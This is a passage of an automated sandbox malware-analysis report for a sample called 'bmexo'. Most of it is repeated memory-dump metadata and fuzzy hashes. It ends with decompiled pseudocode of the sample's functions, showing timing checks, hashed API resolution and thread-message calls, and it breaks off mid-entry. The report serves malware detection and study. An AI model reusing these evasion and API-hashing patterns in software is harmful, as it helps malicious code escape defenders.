                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                          • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                          • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                          • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0099FAE8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                          • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                          • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                          • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0099FBB8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                          • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                          • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                          • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0099FB68 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                          • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                          • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                          • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0099FC90 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                          • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                          • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                          • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0099FC60 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                          • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                          • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                          • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0099FD8C Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                          • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                          • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                          • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0099FDC0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                          • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                          • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                          • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0099FEA0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                          • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                          • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                          • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0099FED0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                          • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                          • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                          • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0099FFB4 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                          • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                          • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                          • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00408ED0 Relevance: .1, Instructions: 92COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 93%
                                          			E00408ED0(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00407210(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407420( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041BF30( &_v284, 0x104);
						E0041C5A0( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00415A40(E004159E0(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L9;
						}
						_t9 = _t52 + 0x18; // 0x5e14c483
						 *(_t52 + 0x478) =  *(_t52 + 0x478) ^  *_t9;
						_t39 = 1;
						L9:
						_t33 = E00407450( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004074D0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x560)) =  *((intOrPtr*)(_t52 + 0x560)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x35)) =  *((intOrPtr*)(_t52 + 0x35)) + _t39;
					_t20 = _t52 + 0x35; // 0xffff43e8
					 *((intOrPtr*)(_t52 + 0x36)) =  *((intOrPtr*)(_t52 + 0x36)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                                          0x00408edb
                                          0x00408ee3
                                          0x00408ee5
                                          0x00408eea
                                          0x00408eef
                                          0x00408f02
                                          0x00408f07
                                          0x00408f10
                                          0x00408f1c
                                          0x00408f2f
                                          0x00408f34
                                          0x00408f37
                                          0x00408f40
                                          0x00408f52
                                          0x00408f57
                                          0x00408f5c
                                          0x00000000
                                          0x00000000
                                          0x00408f5e
                                          0x00408f62
                                          0x00000000
                                          0x00000000
                                          0x00408f64
                                          0x00000000
                                          0x00408f62
                                          0x00408f66
                                          0x00408f69
                                          0x00408f6f
                                          0x00408f71
                                          0x00408f7c
                                          0x00408f81
                                          0x00408f84
                                          0x00408f91
                                          0x00408f9c
                                          0x00408f9e
                                          0x00408fa4
                                          0x00408fa8
                                          0x00408fab
                                          0x00408fab
                                          0x00408fb2
                                          0x00408fb5
                                          0x00408fba
                                          0x00408fc7
                                          0x00408ef6
                                          0x00408ef6
                                          0x00408ef6

                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_bmexo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b77683e0dbd8a0247fb8733bf576a5c0d80217aef466204e60f60e1be2e19e6b
                                          • Instruction ID: 911db63d92bb27313539f87812f39d7602e647c51c5309350fa93bcc7f5e98a2
                                          • Opcode Fuzzy Hash: b77683e0dbd8a0247fb8733bf576a5c0d80217aef466204e60f60e1be2e19e6b
                                          • Instruction Fuzzy Hash: 8F210C72D4020957CB24D6749D42AFB73ACAB54314F44057FF989A3181FA38BB8987A6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00407679 Relevance: 1.6, APIs: 1, Instructions: 58threadwindowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 195 407679-4076ca call 41bf80 call 41cb60 call 40a140 call 415aa0 204 4076cc-4076de PostThreadMessageW 195->204 205 4076fe-407702 195->205 206 4076e0-4076fa call 4098a0 204->206 207 4076fd 204->207 206->207 207->205
                                          C-Code - Quality: 61%
                                          			E00407679(void* __eax, void* __edx, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t14;
				int _t15;
				long _t23;
				int _t28;
				void* _t31;
				void* _t33;
				void* _t38;

				_t38 = __eflags;
				asm("adc ch, ch");
				asm("cdq");
				asm("sbb [ebx-0x7c1374ab], al");
				_t31 = _t33;
				_v68 = 0;
				E0041BF80( &_v67, 0, 0x3f);
				E0041CB60( &_v68, 3);
				_t14 = E0040A140(_t38, _a4 + 0x20,  &_v68); // executed
				_t15 = E00415AA0( &_v68, _a4 + 0x20, _t14, 0, 0, 0xc4e7b6d6);
				_t28 = _t15;
				if(_t28 != 0) {
					_t23 = _a8;
					_t15 = PostThreadMessageW(_t23, 0x111, 0, 0); // executed
					_t40 = _t15;
					if(_t15 == 0) {
						_t15 =  *_t28(_t23, 0x8003, _t31 + (E004098A0(_t40, 1, 8) & 0x000000ff) - 0x40, _t15);
					}
				}
				return _t15;
			}












                                          0x00407679
                                          0x00407679
                                          0x0040767b
                                          0x0040767e
                                          0x00407681
                                          0x0040768f
                                          0x00407693
                                          0x0040769e
                                          0x004076ae
                                          0x004076be
                                          0x004076c3
                                          0x004076ca
                                          0x004076cd
                                          0x004076da
                                          0x004076dc
                                          0x004076de
                                          0x004076fb
                                          0x004076fb
                                          0x004076fd
                                          0x00407702

                                          APIs
                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004076DA
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_bmexo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: b1daca92d2074d12ecf6724030487195ec83ba286d0b60fa55f33f4f6033f87f
                                          • Instruction ID: a06e9c7ab8d2383a5806d67121bdd3b07c7950fca96f9adb7fb60e51f498fcf2
                                          • Opcode Fuzzy Hash: b1daca92d2074d12ecf6724030487195ec83ba286d0b60fa55f33f4f6033f87f
                                          • Instruction Fuzzy Hash: 0D01B931A902187AE72096959C42FFE671C9F45B54F04011EFE04FA1C1D6AD690647E9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00407680 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 210 407680-40768f 211 407698-4076ca call 41cb60 call 40a140 call 415aa0 210->211 212 407693 call 41bf80 210->212 219 4076cc-4076de PostThreadMessageW 211->219 220 4076fe-407702 211->220 212->211 221 4076e0-4076fa call 4098a0 219->221 222 4076fd 219->222 221->222 222->220
                                          C-Code - Quality: 82%
                                          			E00407680(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041BF80( &_v67, 0, 0x3f);
				E0041CB60( &_v68, 3);
				_t12 = E0040A140(_t30, _a4 + 0x20,  &_v68); // executed
				_t13 = E00415AA0( &_v68, _a4 + 0x20, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E004098A0(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                          0x00407680
                                          0x0040768f
                                          0x00407693
                                          0x0040769e
                                          0x004076ae
                                          0x004076be
                                          0x004076c3
                                          0x004076ca
                                          0x004076cd
                                          0x004076da
                                          0x004076dc
                                          0x004076de
                                          0x004076fb
                                          0x004076fb
                                          0x00000000
                                          0x004076fd
                                          0x00407702

                                          APIs
                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004076DA
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_bmexo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: e682585c6d42a928553e758ccfb2ccbbca61c78b357324a4b18dd2d6fca10666
                                          • Instruction ID: b49a75ff1ff2acd002f36703245cffc08f167651a8ee5295d5347c910167830d
                                          • Opcode Fuzzy Hash: e682585c6d42a928553e758ccfb2ccbbca61c78b357324a4b18dd2d6fca10666
                                          • Instruction Fuzzy Hash: 00018831A8022877E720A6959C43FFE776C9F45B54F044119FB04BA1C1E6A9790546EE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A5E0 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 263 41a5e0-41a611 call 41af60 RtlAllocateHeap
                                          C-Code - Quality: 100%
                                          			E0041A5E0(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;

				E0041AF60( *((intOrPtr*)(_a4 + 0x14)), _a4, _t7 + 0xc8c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                          0x0041a5f7
                                          0x0041a60d
                                          0x0041a611

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00415186,?,004158FF,004158FF,?,00415186,?,?,?,?,?,00000000,00409113,?), ref: 0041A60D
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_bmexo.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 8082421df8bc89d162f2638fa4c1385792dc10d17e44cb2d46fb0fb817fbd62f
